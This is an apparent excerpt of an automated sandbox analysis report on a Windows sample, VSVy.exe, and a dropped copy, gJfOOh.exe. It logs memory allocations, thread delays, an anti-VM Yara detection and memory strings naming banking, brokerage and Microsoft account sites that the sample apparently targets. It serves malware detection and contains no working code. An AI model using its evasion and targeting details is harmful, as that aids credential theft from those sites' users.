Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTR

Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: 2900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: 2850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: 4F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: 5F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: 6050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: 7050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: B4C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: C4C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: C950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: D950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: E950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: F950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: 10950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: 1280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: 2CF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Memory allocated: 2A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: 2950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: 4950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: 4FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: 5FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: 6110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: 7110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: AE20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: BE20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: C2B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: 5360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: 6360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: AE20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: 2CB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: 2F60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Memory allocated: 2CB0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\VSVy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Thread delayed: delay time: 600000

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5329			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8092			Jump to behavior

Source: C:\Users\user\Desktop\VSVy.exe TID: 2148	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe TID: 6400	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1292	Thread sleep count: 5329 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5412	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3292	Thread sleep count: 161 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6416	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3780	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe TID: 2140	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe TID: 2140	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe TID: 4564	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe TID: 652	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe TID: 4676	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe TID: 4676	Thread sleep time: -600000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\VSVy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Thread delayed: delay time: 600000

Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3900002399.0000000001036000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=n
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
